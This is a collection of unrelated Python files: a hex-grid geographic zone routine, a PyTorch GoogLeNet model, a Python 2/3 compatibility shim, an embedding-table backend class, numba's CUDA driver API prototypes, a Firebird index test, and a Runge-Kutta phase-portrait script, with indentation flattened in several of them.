to_remove.add(Zone(level, ll_zone.hex_x_no - 1, ll_zone.hex_y_no))
to_remove.add(Zone(level, lr_zone.hex_x_no, lr_zone.hex_y_no - 1))
to_remove.add(Zone(level, ul_zone.hex_x_no, ul_zone.hex_y_no + 1))
to_remove.add(Zone(level, ur_zone.hex_x_no + 1, ur_zone.hex_y_no))
result = set()
width = lr_zone.get_distance(ll_zone)
height = ul_zone.get_distance(ll_zone)
for i in range(0, width // 2 + 1):
base1 = Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no - i)
#result.append(base1)
for j in range(0, height + 1):
result.add(Zone(level, base1.hex_x_no + j, base1.hex_y_no + j))
if base1.code != lr_zone.code:
##base2 = Zone(level, base1.hex_x_no, base1.hex_y_no -1)
base2 = Zone(level, base1.hex_x_no + 1, base1.hex_y_no)
#result.append(base2)
##for k in range(0, height + 2):
## result.append(Zone(level, base2.hex_x_no + k, base2.hex_y_no + k))
for k in range(0, height ):
result.add(Zone(level, base2.hex_x_no + k, base2.hex_y_no + k))
if ll_zone.get_vertices_deg()[0][1] > miny:
for i in range(0, width // 2 + 1):
result.add(Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no - 1 -i))
if ul_zone.get_vertices_deg()[0][1] < maxy:
for i in range(0, width // 2 + 1):
result.add(Zone(level, ul_zone.hex_x_no + 1 + i, ul_zone.hex_y_no - i))
if ll_zone.get_vertices_deg()[1][0] > minx:
for i in range(0, height):
result.add(Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no + 1 + i))
if lr_zone.get_vertices_deg()[2][0] < maxx:
for i in range(0, height):
result.add(Zone(level, lr_zone.hex_x_no + 1 + i, lr_zone.hex_y_no + i))
return result - to_remove
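# A minimal usage sketch (not part of the original module), assuming the
# projection helpers imported above (HEX_LEN, deg2meter, meter2deg, HALF_EL)
# behave as the functions here expect; the lon/lat values are arbitrary examples.
#
#   zone = create_zone(7, 139.745433, 35.658581)
#   assert create_zone_by_code(zone.code) == zone      # encode/decode round trip
#   neighbours = zone.get_movable_zones(1)             # the 6 adjacent hexes
#   covering = create_zones_by_extent(7, 139.70, 35.60, 139.80, 35.70)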
|
import warnings
from collections import namedtuple
from typing import Optional, Tuple, List, Callable, Any
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
class BasicConv2d(nn.Module):
def __init__(self, in_channels: int, out_channels: int, kernel_size, stride=1, **kwargs: Any) -> None:
super().__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, **kwargs)
self.bn = nn.BatchNorm2d(out_channels, eps=0.001)
def forward(self, x: Tensor) -> Tensor:
x = self.conv(x)
x = self.bn(x)
return F.relu(x, inplace=True)
class Inception(nn.Module):
def __init__(
self,
in_channels: int,
ch1x1: int,
ch3x3red: int,
ch3x3: int,
ch5x5red: int,
ch5x5: int,
pool_proj: int,
) -> None:
super().__init__()
self.branch1 = BasicConv2d(in_channels, ch1x1, kernel_size=1)
self.branch2 = nn.Sequential(
BasicConv2d(in_channels, ch3x3red, kernel_size=1),
BasicConv2d(ch3x3red, ch3x3, kernel_size=3, padding=1)
)
self.branch3 = nn.Sequential(
BasicConv2d(in_channels, ch5x5red, kernel_size=1),
BasicConv2d(ch5x5red, ch5x5, kernel_size=3, padding=1),
)
self.branch4 = nn.Sequential(
nn.MaxPool2d(kernel_size=3, stride=1, padding=1, ceil_mode=True),
BasicConv2d(in_channels, pool_proj, kernel_size=1),
)
def forward(self, x: Tensor) -> Tensor:
branch1 = self.branch1(x)
branch2 = self.branch2(x)
branch3 = self.branch3(x)
branch4 = self.branch4(x)
return torch.cat([branch1, branch2, branch3, branch4], 1)
class GoogLeNet(nn.Module):
    def __init__(self, num_classes: int = 1000, dropout: float = 0.5) -> None:
super().__init__()
self.features = [
BasicConv2d(3, 64, kernel_size=7, stride=2, padding=3), # N x 64 x 112 x 112
nn.MaxPool2d(3, stride=2, ceil_mode=True), # N x 64 x 56 x 56
BasicConv2d(64, 64, kernel_size=1), # N x 64 x 56 x 56
BasicConv2d(64, 192, kernel_size=3, padding=1), # N x 192 x 56 x 56
            nn.MaxPool2d(3, stride=2, ceil_mode=True),  # N x 192 x 28 x 28
Inception(192, 64, 96, 128, 16, 32, 32), # N x 256 x 28 x 28
Inception(256, 128, 128, 192, 32, 96, 64), # N x 480 x 28 x 28
nn.MaxPool2d(3, stride=2, ceil_mode=True), # N x 480 x 14 x 14
Inception(480, 192, 96, 208, 16, 48, 64), # N x 512 x 14 x 14
Inception(512, 160, 112, 224, 24, 64, 64), # N x 512 x 14 x 14
Inception(512, 128, 128, 256, 24, 64, 64), # N x 512 x 14 x 14
Inception(512, 112, 144, 288, 32, 64, 64), # N x 528 x 14 x 14
Inception(528, 256, 160, 320, 32, 128, 128), # N x 832 x 14 x 14
nn.MaxPool2d(2, stride=2, ceil_mode=True), # N x 832 x 7 x 7
Inception(832, 256, 160, 320, 32, 128, 128), # N x 1024 x 7 x 7
Inception(832, 384, 192, 384, 48, 128, 128), # N x 1024 x 7 x 7
]
self.features_out = [
64, 64, 64, 192, 192,
256, 480, 480,
512, 512, 512, 528, 832, 832,
1024, 1024
]
self.model = nn.Sequential(*self.features)
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        self.dropout = nn.Dropout(dropout)
        self.fc = nn.Linear(1024, num_classes)
def forward(self, x: Tensor):
x = self.model(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.dropout(x)
x = self.fc(x)
return x
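# A short, hedged shape check (not part of the original file): with a standard
# 3x224x224 input the feature stack above ends at 1024x7x7, so the pooled and
# flattened vector feeding the classifier has 1024 features.
if __name__ == "__main__":
    model = GoogLeNet(num_classes=10)
    model.eval()
    with torch.no_grad():
        logits = model(torch.randn(1, 3, 224, 224))
    print(logits.shape)  # expected: torch.Size([1, 10])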
|
"""Python 2/3 compat layer."""
from __future__ import print_function, division, absolute_import
try:
basestring
except NameError:
basestring = str
try:
unicode
except NameError:
unicode = str
try:
unichr
bytechr = chr
byteord = ord
except NameError:
unichr = chr
def bytechr(n):
return bytes([n])
def byteord(c):
return c if isinstance(c, int) else ord(c)
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
def strjoin(iterable, joiner=''):
return tostr(joiner).join(iterable)
def tobytes(s, encoding='ascii', errors='strict'):
if not isinstance(s, bytes):
return s.encode(encoding, errors)
else:
return s
def tounicode(s, encoding='ascii', errors='strict'):
if not isinstance(s, unicode):
return s.decode(encoding, errors)
else:
return s
if str == bytes:
class Tag(str):
def tobytes(self):
if isinstance(self, bytes):
return self
else:
return self.encode('latin1')
tostr = tobytes
bytesjoin = strjoin
else:
class Tag(str):
@staticmethod
def transcode(blob):
if not isinstance(blob, str):
blob = blob.decode('latin-1')
return blob
def __new__(self, content):
return str.__new__(self, self.transcode(content))
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
return str.__eq__(self, self.transcode(other))
def __hash__(self):
return str.__hash__(self)
def tobytes(self):
return self.encode('latin-1')
tostr = tounicode
def bytesjoin(iterable, joiner=b''):
return tobytes(joiner).join(tobytes(item) for item in iterable)
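# Hedged examples (not part of the original module) of the Python 3 branch above:
#   tobytes('abc')          -> b'abc'
#   tostr(b'abc')           -> 'abc'     (tostr is tounicode here)
#   bytesjoin([b'a', 'b'])  -> b'ab'
#   Tag(b'glyf') == 'glyf'  -> True      (tags compare as latin-1 text)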
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''Backend of embedding tables.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from tensorflow.python.saved_model.model_utils import mode_keys
from hybridbackend.tensorflow.framework.context import Context
class EmbeddingBackend(object): # pylint: disable=useless-object-inheritance
r'''Backend for embedding columns.
An embedding backend manages underlying storage for embedding columns. Data
scientists can extend this class for customized implementation of embedding
weights.
'''
_registry = {}
@classmethod
def register(cls, impl):
r'''Register implementation.
Args:
impl: Implementation to register.
'''
cls._registry[impl.NAME] = impl
@classmethod
def get(cls):
r'''Get an instance of registered implementation.
Returns:
An instance of registered implementation.
'''
backend = Context.get().options.emb_backend
if backend not in cls._registry:
raise ValueError(f'emb_backend is invalid: {backend}')
return cls._registry[backend]
@abc.abstractmethod
def build(
self,
column,
name,
shape,
dtype=None,
trainable=True,
use_resource=True,
initializer=None,
collections=None,
layer=None):
r'''Creates the embedding lookup weight.
Args:
column: An `EmbeddingColumn` for building weight.
name: Name of the embedding weights.
shape: Shape of the embedding weights.
dtype: (Optional.) Data type of the embedding weights.
trainable: (Optional.) If True, the embedding weights can be trained.
use_resource: (Optional.) If True, the embedding weights uses resource.
initializer: (Optional.) Initializer of the embedding weights.
collections: (Optional.) Collections of the embedding weights.
layer: `DenseFeatures` layer which manages weights.
Returns:
The embedding weight.
'''
@abc.abstractmethod
def init_from_checkpoint(
self, column, ckpt_dir_or_file, tensor_name_in_ckpt, to_restore):
r'''Replaces initializers of embedding weights to load from checkpoints.
Args:
column: An `EmbeddingColumn`.
      ckpt_dir_or_file: Directory with checkpoints, or path to a specific
        checkpoint file.
tensor_name_in_ckpt: Name of the `Tensor` in `ckpt_dir_or_file` from
which to restore the column weights. Required if `ckpt_to_load_from`
is not `None`.
to_restore: `Tensor` to restore.
'''
@abc.abstractmethod
def lookup(self, column, weight, inputs, sharded=False, buffered=False):
r'''Lookup for embedding vectors.
Args:
column: An `EmbeddingColumn`.
weight: Embedding weight.
inputs: Inputs for embedding lookup.
sharded: If True inputs are sharded.
buffered: If True initialization would be delayed.
Returns:
Embedding vectors from the weight.
'''
@abc.abstractmethod
def update(self, column, weight, indexed_updates):
r'''Update embedding weight.
Args:
column: An `EmbeddingColumn`.
weight: Embedding weight.
indexed_updates: An `IndexedSlices` to update weight in specific indices.
'''
def buffer_size(self):
r'''Buffer size of embedding variables for training.
'''
return Context.get().options.emb_buffer_size
def buffer_load_factor(self):
r'''Buffer load factor of embedding variables for training.
'''
return Context.get().options.emb_buffer_load_factor
def num_groups(self):
r'''Number of embedding column groups for training.
'''
return Context.get().options.emb_num_groups
def enable_concat(self):
r'''If True, concat embedding vectors for training.
'''
return Context.get().options.emb_enable_concat
def num_buckets(self, column):
r'''Number of buckets for the column.
'''
num_buckets = getattr(
column.categorical_column, 'num_buckets',
column.categorical_column._num_buckets) # pylint: disable=protected-access
return num_buckets
def dimension(self, column):
r'''Dimension of the column.
'''
return column.dimension
@property
def enable_sharding(self):
r'''Whether the sharding is enabled.
'''
return not mode_keys.is_predict(Context.get().options.mode)
def sharded(self, column):
r'''Whether the column should be sharded.
'''
if Context.get().world_size <= 1:
return False
if not self.enable_sharding:
return False
batch_size = Context.get().options.batch_size
if batch_size < 0 or self.num_buckets(column) is None:
return True
if batch_size < self.num_buckets(column):
return True
return False
def unique(self, column):
r'''Whether inputs for the column is already unique.
'''
return Context.get().options.emb_unique[column.categorical_column.name]
def device(self, column):
r'''Device of the column weights.
'''
return Context.get().options.emb_device[column.categorical_column.name]
def input_device(self, column):
r'''Device of embedding lookup inputs.
'''
options = Context.get().options
return options.emb_input_device[column.categorical_column.name]
def dtype(self, column):
r'''Data type of the column weights.
'''
return Context.get().options.emb_dtype[column.categorical_column.name]
def wire_dtype(self, column):
    r'''Data type of the column for communication.
'''
return Context.get().options.emb_wire_dtype[column.categorical_column.name]
def input_dtype(self, column):
r'''Data type of the column inputs.
'''
return Context.get().options.emb_input_dtype[column.categorical_column.name]
def segment_rank(self, column):
r'''Segment rank of the column weights.
'''
options = Context.get().options
return options.emb_segment_rank[column.categorical_column.name]
def weight_name(self, column):
r'''Name of the column weights.
'''
name = 'embedding_weights'
if self.sharded(column):
shard = Context.get().rank
name = f'{name}/part_{shard}'
return name
def weight_shared_name(self, column, var):
    r'''Get shared name of the column weights from a variable.
'''
var_name = var.name.split(':')[0]
if self.sharded(column):
return var_name.split('/part')[0]
return var_name
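# A hedged sketch (not part of the original module) of how the registry above
# is meant to be used: a concrete backend subclasses EmbeddingBackend, fills in
# the abstract methods with real variable-creation and lookup logic, and
# registers an instance under its NAME so that the `emb_backend` option can
# select it. The class name and NAME value below are hypothetical.
#
#   class MyEmbeddingBackend(EmbeddingBackend):
#     NAME = 'MY_BACKEND'
#     def build(self, column, name, shape, **kwargs):
#       ...  # create and return the embedding weight
#     def lookup(self, column, weight, inputs, sharded=False, buffered=False):
#       ...  # gather embedding vectors from the weight
#     def init_from_checkpoint(self, column, ckpt_dir_or_file,
#                              tensor_name_in_ckpt, to_restore):
#       ...
#     def update(self, column, weight, indexed_updates):
#       ...
#
#   EmbeddingBackend.register(MyEmbeddingBackend())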
|
from ctypes import *
from numba.cuda.cudadrv import _extras
cu_device = c_int
cu_device_attribute = c_int # enum
cu_context = c_void_p # an opaque handle
cu_module = c_void_p # an opaque handle
cu_jit_option = c_int # enum
cu_jit_input_type = c_int # enum
cu_function = c_void_p # an opaque handle
cu_device_ptr = c_size_t # defined as unsigned int on 32-bit
# and unsigned long long on 64-bit machine
cu_stream = c_void_p # an opaque handle
cu_event = c_void_p
cu_link_state = c_void_p
cu_function_attribute = c_int
cu_ipc_mem_handle = (c_byte * _extras.CUDA_IPC_HANDLE_SIZE) # 64 bytes wide
cu_stream_callback_pyobj = CFUNCTYPE(None, cu_stream, c_int, py_object)
cu_occupancy_b2d_size = CFUNCTYPE(c_size_t, c_int)
# See https://docs.nvidia.com/cuda/cuda-driver-api/group__CUDA__TYPES.html
CU_STREAM_DEFAULT = 0
CU_STREAM_LEGACY = 1
CU_STREAM_PER_THREAD = 2
API_PROTOTYPES = {
# CUresult cuInit(unsigned int Flags);
'cuInit' : (c_int, c_uint),
# CUresult cuDriverGetVersion ( int* driverVersion )
'cuDriverGetVersion': (c_int, POINTER(c_int)),
# CUresult cuDeviceGetCount(int *count);
'cuDeviceGetCount': (c_int, POINTER(c_int)),
# CUresult cuDeviceGet(CUdevice *device, int ordinal);
'cuDeviceGet': (c_int, POINTER(cu_device), c_int),
# CUresult cuDeviceGetName ( char* name, int len, CUdevice dev )
'cuDeviceGetName': (c_int, c_char_p, c_int, cu_device),
# CUresult cuDeviceGetAttribute(int *pi, CUdevice_attribute attrib,
# CUdevice dev);
'cuDeviceGetAttribute': (c_int, POINTER(c_int), cu_device_attribute,
cu_device),
# CUresult cuDeviceComputeCapability(int *major, int *minor,
# CUdevice dev);
'cuDeviceComputeCapability': (c_int, POINTER(c_int), POINTER(c_int),
cu_device),
# CUresult cuDevicePrimaryCtxGetState ( CUdevice dev, unsigned int* flags, int* active )
'cuDevicePrimaryCtxGetState': (c_int,
cu_device, POINTER(c_uint), POINTER(c_int)),
# CUresult cuDevicePrimaryCtxRelease ( CUdevice dev )
'cuDevicePrimaryCtxRelease': (c_int, cu_device),
# CUresult cuDevicePrimaryCtxReset ( CUdevice dev )
'cuDevicePrimaryCtxReset': (c_int, cu_device),
# CUresult cuDevicePrimaryCtxRetain ( CUcontext* pctx, CUdevice dev )
'cuDevicePrimaryCtxRetain': (c_int, POINTER(cu_context), cu_device),
# CUresult cuDevicePrimaryCtxSetFlags ( CUdevice dev, unsigned int flags )
'cuDevicePrimaryCtxSetFlags': (c_int, cu_device, c_uint),
# CUresult cuCtxCreate(CUcontext *pctx, unsigned int flags,
# CUdevice dev);
'cuCtxCreate': (c_int, POINTER(cu_context), c_uint, cu_device),
# CUresult cuCtxGetDevice ( CUdevice * device )
'cuCtxGetDevice': (c_int, POINTER(cu_device)),
# CUresult cuCtxGetCurrent (CUcontext *pctx);
'cuCtxGetCurrent': (c_int, POINTER(cu_context)),
# CUresult cuCtxPushCurrent (CUcontext pctx);
'cuCtxPushCurrent': (c_int, cu_context),
# CUresult cuCtxPopCurrent (CUcontext *pctx);
'cuCtxPopCurrent': (c_int, POINTER(cu_context)),
# CUresult cuCtxDestroy(CUcontext pctx);
'cuCtxDestroy': (c_int, cu_context),
# CUresult cuModuleLoadDataEx(CUmodule *module, const void *image,
# unsigned int numOptions,
# CUjit_option *options,
# void **optionValues);
'cuModuleLoadDataEx': (c_int, cu_module, c_void_p, c_uint,
POINTER(cu_jit_option), POINTER(c_void_p)),
# CUresult cuModuleUnload(CUmodule hmod);
'cuModuleUnload': (c_int, cu_module),
# CUresult cuModuleGetFunction(CUfunction *hfunc, CUmodule hmod,
# const char *name);
'cuModuleGetFunction': (c_int, cu_function, cu_module, c_char_p),
# CUresult cuModuleGetGlobal ( CUdeviceptr* dptr, size_t* bytes, CUmodule
# hmod, const char* name )
'cuModuleGetGlobal': (c_int, POINTER(cu_device_ptr), POINTER(c_size_t),
cu_module, c_char_p),
# CUresult CUDAAPI cuFuncSetCacheConfig(CUfunction hfunc,
# CUfunc_cache config);
'cuFuncSetCacheConfig': (c_int, cu_function, c_uint),
# CUresult cuMemAlloc(CUdeviceptr *dptr, size_t bytesize);
'cuMemAlloc': (c_int, POINTER(cu_device_ptr), c_size_t),
# CUresult cuMemsetD8(CUdeviceptr dstDevice, unsigned char uc, size_t N)
'cuMemsetD8': (c_int, cu_device_ptr, c_uint8, c_size_t),
# CUresult cuMemsetD8Async(CUdeviceptr dstDevice, unsigned char uc,
# size_t N, CUstream hStream);
'cuMemsetD8Async': (c_int,
cu_device_ptr, c_uint8, c_size_t, cu_stream),
# CUresult cuMemcpyHtoD(CUdeviceptr dstDevice, const void *srcHost,
# size_t ByteCount);
'cuMemcpyHtoD': (c_int, cu_device_ptr, c_void_p, c_size_t),
# CUresult cuMemcpyHtoDAsync(CUdeviceptr dstDevice, const void *srcHost,
# size_t ByteCount, CUstream hStream);
'cuMemcpyHtoDAsync': (c_int, cu_device_ptr, c_void_p, c_size_t,
cu_stream),
# CUresult cuMemcpyHtoD(CUdeviceptr dstDevice, const void *srcHost,
# size_t ByteCount);
'cuMemcpyDtoD': (c_int, cu_device_ptr, cu_device_ptr, c_size_t),
# CUresult cuMemcpyHtoDAsync(CUdeviceptr dstDevice, const void *srcHost,
# size_t ByteCount, CUstream hStream);
'cuMemcpyDtoDAsync': (c_int, cu_device_ptr, cu_device_ptr, c_size_t,
cu_stream),
# CUresult cuMemcpyDtoH(void *dstHost, CUdeviceptr srcDevice,
# size_t ByteCount);
'cuMemcpyDtoH': (c_int, c_void_p, cu_device_ptr, c_size_t),
# CUresult cuMemcpyDtoHAsync(void *dstHost, CUdeviceptr srcDevice,
# size_t ByteCount, CUstream hStream);
'cuMemcpyDtoHAsync': (c_int, c_void_p, cu_device_ptr, c_size_t,
cu_stream),
# CUresult cuMemFree(CUdeviceptr dptr);
'cuMemFree': (c_int, cu_device_ptr),
# CUresult cuStreamCreate(CUstream *phStream, unsigned int Flags);
'cuStreamCreate': (c_int, POINTER(cu_stream), c_uint),
# CUresult cuStreamDestroy(CUstream hStream);
'cuStreamDestroy': (c_int, cu_stream),
# CUresult cuStreamSynchronize(CUstream hStream);
'cuStreamSynchronize': (c_int, cu_stream),
# CUresult cuStreamAddCallback(CUstream hStream, CUstreamCallback callback, void* userData, unsigned int flags)
'cuStreamAddCallback': (c_int, cu_stream, cu_stream_callback_pyobj, py_object, c_uint),
# CUresult cuLaunchKernel(CUfunction f, unsigned int gridDimX,
# unsigned int gridDimY,
# unsigned int gridDimZ,
# unsigned int blockDimX,
# unsigned int blockDimY,
# unsigned int blockDimZ,
# unsigned int sharedMemBytes,
# CUstream hStream, void **kernelParams,
# void ** extra)
'cuLaunchKernel': (c_int, cu_function, c_uint, c_uint, c_uint,
c_uint, c_uint, c_uint, c_uint, cu_stream,
POINTER(c_void_p), POINTER(c_void_p)),
# CUresult cuMemHostAlloc ( void ** pp,
# size_t bytesize,
# unsigned int Flags
# )
'cuMemHostAlloc': (c_int, c_void_p, c_size_t, c_uint),
# CUresult cuMemFreeHost ( void * p )
'cuMemFreeHost': (c_int, c_void_p),
# CUresult cuMemHostRegister(void * p,
# size_t bytesize,
# unsigned int Flags)
'cuMemHostRegister': (c_int, c_void_p, c_size_t, c_uint),
# CUresult cuMemHostUnregister(void * p)
'cuMemHostUnregister': (c_int, c_void_p),
# CUresult cuMemHostGetDevicePointer(CUdeviceptr * pdptr,
# void * p,
# unsigned int Flags)
'cuMemHostGetDevicePointer': (c_int, POINTER(cu_device_ptr),
c_void_p, c_uint),
# CUresult cuMemGetInfo(size_t * free, size_t * total)
'cuMemGetInfo' : (c_int, POINTER(c_size_t), POINTER(c_size_t)),
# CUresult cuEventCreate ( CUevent * phEvent,
# unsigned int Flags )
'cuEventCreate': (c_int, POINTER(cu_event), c_uint),
# CUresult cuEventDestroy ( CUevent hEvent )
'cuEventDestroy': (c_int, cu_event),
# CUresult cuEventElapsedTime ( float * pMilliseconds,
# CUevent hStart,
# CUevent hEnd )
'cuEventElapsedTime': (c_int, POINTER(c_float), cu_event, cu_event),
# CUresult cuEventQuery ( CUevent hEvent )
'cuEventQuery': (c_int, cu_event),
# CUresult cuEventRecord ( CUevent hEvent,
# CUstream hStream )
'cuEventRecord': (c_int, cu_event, cu_stream),
# CUresult cuEventSynchronize ( CUevent hEvent )
'cuEventSynchronize': (c_int, cu_event),
# CUresult cuStreamWaitEvent ( CUstream hStream,
# CUevent hEvent,
# unsigned int Flags )
'cuStreamWaitEvent': (c_int, cu_stream, cu_event, c_uint),
# CUresult cuPointerGetAttribute (void *data, CUpointer_attribute attribute, CUdeviceptr ptr)
'cuPointerGetAttribute': (c_int, c_void_p, c_uint, cu_device_ptr),
# CUresult cuMemGetAddressRange ( CUdeviceptr * pbase,
# size_t * psize,
# CUdeviceptr dptr
# )
'cuMemGetAddressRange': (c_int,
POINTER(cu_device_ptr),
POINTER(c_size_t),
cu_device_ptr),
# CUresult cuMemHostGetFlags ( unsigned int * pFlags,
# void * p )
'cuMemHostGetFlags': (c_int,
POINTER(c_uint),
c_void_p),
# CUresult cuCtxSynchronize ( void )
'cuCtxSynchronize' : (c_int,),
# CUresult
# cuLinkCreate(unsigned int numOptions, CUjit_option *options,
# void **optionValues, CUlinkState *stateOut);
'cuLinkCreate': (c_int,
c_uint, POINTER(cu_jit_option),
POINTER(c_void_p), POINTER(cu_link_state)),
# CUresult
# cuLinkAddData(CUlinkState state, CUjitInputType type, void *data,
# size_t size, const char *name, unsigned
# int numOptions, CUjit_option *options,
# void **optionValues);
'cuLinkAddData': (c_int,
cu_link_state, cu_jit_input_type, c_void_p,
c_size_t, c_char_p, c_uint, POINTER(cu_jit_option),
POINTER(c_void_p)),
# CUresult
# cuLinkAddFile(CUlinkState state, CUjitInputType type,
# const char *path, unsigned int numOptions,
# CUjit_option *options, void **optionValues);
'cuLinkAddFile': (c_int,
cu_link_state, cu_jit_input_type, c_char_p, c_uint,
POINTER(cu_jit_option), POINTER(c_void_p)),
# CUresult CUDAAPI
# cuLinkComplete(CUlinkState state, void **cubinOut, size_t *sizeOut)
'cuLinkComplete': (c_int,
cu_link_state, POINTER(c_void_p), POINTER(c_size_t)),
# CUresult CUDAAPI
# cuLinkDestroy(CUlinkState state)
'cuLinkDestroy': (c_int, cu_link_state),
# cuProfilerInitialize ( const char* configFile, const char*
# outputFile, CUoutput_mode outputMode )
# 'cuProfilerInitialize': (c_int, c_char_p, c_char_p, cu_output_mode),
# cuProfilerStart ( void )
'cuProfilerStart': (c_int,),
# cuProfilerStop ( void )
'cuProfilerStop': (c_int,),
# CUresult cuFuncGetAttribute ( int* pi, CUfunction_attribute attrib,
# CUfunction hfunc )
'cuFuncGetAttribute': (c_int,
POINTER(c_int), cu_function_attribute, cu_function),
# CUresult CUDAAPI cuOccupancyMaxActiveBlocksPerMultiprocessor(int *numBlocks,
# CUfunction func,
# int blockSize,
# size_t dynamicSMemSize);
'cuOccupancyMaxActiveBlocksPerMultiprocessor': (c_int,
POINTER(c_int), cu_function, c_size_t, c_uint),
# CUresult CUDAAPI cuOccupancyMaxActiveBlocksPerMultiprocessorWithFlags(int *numBlocks,
# CUfunction func,
# int blockSize,
# size_t dynamicSMemSize,
# unsigned int flags);
    'cuOccupancyMaxActiveBlocksPerMultiprocessorWithFlags': (c_int,
        POINTER(c_int), cu_function, c_size_t, c_uint, c_uint),
# CUresult CUDAAPI cuOccupancyMaxPotentialBlockSize(int *minGridSize, int *blockSize,
# CUfunction func, CUoccupancyB2DSize blockSizeToDynamicSMemSize,
# size_t dynamicSMemSize, int blockSizeLimit);
'cuOccupancyMaxPotentialBlockSize': (c_int,
POINTER(c_int), POINTER(c_int), cu_function, cu_occupancy_b2d_size, c_size_t, c_int),
# CUresult CUDAAPI cuOccupancyMaxPotentialBlockSizeWithFlags(int *minGridSize, int *blockSize,
# CUfunction func, CUoccupancyB2DSize blockSizeToDynamicSMemSize,
# size_t dynamicSMemSize, int blockSizeLimit, unsigned int flags);
'cuOccupancyMaxPotentialBlockSizeWithFlags': (c_int,
POINTER(c_int), POINTER(c_int), cu_function, cu_occupancy_b2d_size, c_size_t, c_int, c_uint),
# CUresult cuIpcGetMemHandle ( CUipcMemHandle* pHandle, CUdeviceptr dptr )
'cuIpcGetMemHandle': (c_int,
POINTER(cu_ipc_mem_handle), cu_device_ptr),
# CUresult cuIpcOpenMemHandle ( CUdeviceptr* pdptr, CUipcMemHandle handle, unsigned int Flags )
'cuIpcOpenMemHandle': (c_int,
POINTER(cu_device_ptr), cu_ipc_mem_handle, c_uint),
# CUresult cuIpcCloseMemHandle ( CUdeviceptr dptr )
'cuIpcCloseMemHandle': (c_int,
cu_device_ptr),
# CUresult cuCtxEnablePeerAccess ( CUcontext peerContext, unsigned int Flags )
'cuCtxEnablePeerAccess': (c_int,
cu_context, c_int),
# CUresult cuDeviceCanAccessPeer ( int* canAccessPeer,
# CUdevice dev, CUdevice peerDev )
'cuDeviceCanAccessPeer': (c_int,
POINTER(c_int), cu_device, cu_device),
}
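# A hedged illustration (not part of the original module) of how a prototype
# tuple maps onto a ctypes binding: the first element is the restype, the rest
# are the argtypes. Loading the driver library by name below is an assumption;
# the real driver wrapper adds error checking and platform-specific loading.
#
#   lib = CDLL('libcuda.so')
#   proto = API_PROTOTYPES['cuDriverGetVersion']   # (restype, *argtypes)
#   fn = lib.cuDriverGetVersion
#   fn.restype, fn.argtypes = proto[0], proto[1:]
#   version = c_int()
#   fn(byref(version))
#   print(version.value)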
|
#coding:utf-8
#
# id: functional.arno.indices.upper_bound_asc_01_segments_02
# title: ASC single index upper bound
# description:  Check if all 32 values are fetched with "lower than" operator.
# tracker_id:
# min_versions: []
# versions: 1.5
# qmid: functional.arno.indexes.upper_bound_asc_01_segments_02
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 1.5
# resources: None
substitutions_1 = []
init_script_1 = """CREATE TABLE Table_66 (
ID INTEGER
);
SET TERM ^^ ;
CREATE PROCEDURE PR_FillTable_66
AS
DECLARE VARIABLE FillID INTEGER;
BEGIN
FillID = 2147483647;
WHILE (FillID > 0) DO
BEGIN
INSERT INTO Table_66 (ID) VALUES (:FillID);
FillID = FillID / 2;
END
INSERT INTO Table_66 (ID) VALUES (NULL);
INSERT INTO Table_66 (ID) VALUES (0);
INSERT INTO Table_66 (ID) VALUES (NULL);
FillID = -2147483648;
WHILE (FillID < 0) DO
BEGIN
INSERT INTO Table_66 (ID) VALUES (:FillID);
FillID = FillID / 2;
END
END
^^
SET TERM ; ^^
COMMIT;
EXECUTE PROCEDURE PR_FillTable_66;
COMMIT;
CREATE ASC INDEX I_Table_66_ASC ON Table_66 (ID);
COMMIT;
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """SET PLAN ON;
SELECT
ID
FROM
Table_66 t66
WHERE
t66.ID < 0;"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """PLAN (T66 INDEX (I_TABLE_66_ASC))
ID
============
-2147483648
-1073741824
-536870912
-268435456
-134217728
-67108864
-33554432
-16777216
-8388608
-4194304
-2097152
-1048576
-524288
-262144
-131072
-65536
-32768
-16384
-8192
-4096
ID
============
-2048
-1024
-512
-256
-128
-64
-32
-16
-8
-4
-2
-1"""
@pytest.mark.version('>=1.5')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
|
#!/usr/bin/env python
""" Here we draw the 2-D phase portrait of the equations """
import numpy as np
import matplotlib.pyplot as plt
from runge_kutta4 import rk4
def x_dot(t, x):
return x[1]
def u_dot(t, x):
gamma1 = 0.1
a1 = 3
b1 = 2.2
epsilon1 = 17.09
omega1 = 2 * np.pi
c1 = 2.2
Omega = 15
return -(gamma1 + a1 * x[0] ** 2 + b1 * x[2] ** 2) * x[1]\
- omega1 ** 2 * (1 + epsilon1 * np.sin(2 * Omega * t)) * x[0]\
- c1 * x[2] ** 2 * np.sin(Omega * t)
def y_dot(t, x):
return x[3]
def v_dot(t, x):
gamma2 = 0.1
epsilon2 = 2.99
omega2 = 2 * np.pi
d2 = 10
a2 = 9.8
b2 = 2.2
Omega = 15
return -(gamma2 + a2 * x[2] ** 2 + b2 * x[0] ** 2) * x[3]\
-omega2 ** 2 * (1 + epsilon2 * np.sin(2 * Omega * t)) * x[2]\
- d2 * x[1]
def main():
""" main body """
dots = [x_dot, u_dot, y_dot, v_dot]
x_init = [0.1, 0, 0.1, 0]
step = 0.005
end = 50
time, data = rk4(x_init, dots, step, end)
# plot y(t)
    plt.plot(time, data[2], lw=1, label='y(t)')
plt.legend()
